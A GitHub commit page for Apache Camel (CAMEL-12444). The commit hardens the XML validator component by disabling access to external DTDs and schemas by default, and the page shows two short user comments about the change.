Skip to content

Commit

Permalink
CAMEL-12444: Improved DTD handling in validator component.
Browse files Browse the repository at this point in the history
  • Loading branch information
@davsclaus
davsclaus committed Apr 16, 2018
1 parent 750c8e4 commit 24eefa5
Show file tree
Hide file tree
Showing 2 changed files with 14 additions and 0 deletions.
1 change: 1 addition & 0 deletions camel-core/src/main/java/org/apache/camel/processor/validation/SchemaReader.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -175,6 +175,7 @@ protected SchemaFactory createSchemaFactory() {
}
if (camelContext == null || !Boolean.parseBoolean(camelContext.getGlobalOptions().get(ACCESS_EXTERNAL_DTD))) {
try {
LOG.debug("Configuring SchemaFactory to not allow access to external DTD/Schema");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
} catch (SAXException e) {
LOG.warn(e.getMessage(), e);
Expand Down
13 changes: 13 additions & 0 deletions camel-core/src/main/java/org/apache/camel/processor/validation/ValidatingProcessor.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,7 @@
import java.net.URL;
import java.util.Collections;

import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
Expand Down Expand Up @@ -53,6 +54,8 @@
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

import static org.apache.camel.processor.validation.SchemaReader.ACCESS_EXTERNAL_DTD;

/**
* A processor which validates the XML version of the inbound message body
* against some schema either in XSD or RelaxNG
Expand Down Expand Up @@ -100,6 +103,16 @@ protected void doProcess(Exchange exchange) throws Exception {
}

Validator validator = schema.newValidator();
// turn off access to external schema by default
if (!Boolean.parseBoolean(exchange.getContext().getGlobalOptions().get(ACCESS_EXTERNAL_DTD))) {
try {
LOG.debug("Configuring Validator to not allow access to external DTD/Schema");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
} catch (SAXException e) {
LOG.warn(e.getMessage(), e);
}
}

// the underlying input stream, which we need to close to avoid locking files or other resources
Source source = null;
Expand Down

2 comments on commit 24eefa5

@Huorang-Liu
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The first change has added a command that the SchemaFactory cannot access the documents outside of the intended sphere of control. When it does, it will debug to the system to let them know the situation to avoid attackers force the application to make outgoing requests to servers that the attacker cannot reach directly using the CWE-611.
The second change has used ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to judge the property of DTD and SCHEMA to monitor the DTD and Schema whether they have got messages and when it happens, giving warnings.

@oscerd
Copy link
Contributor

@oscerd oscerd commented on 24eefa5 Aug 21, 2020

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What is the meaning of this comment?

Please sign in to comment.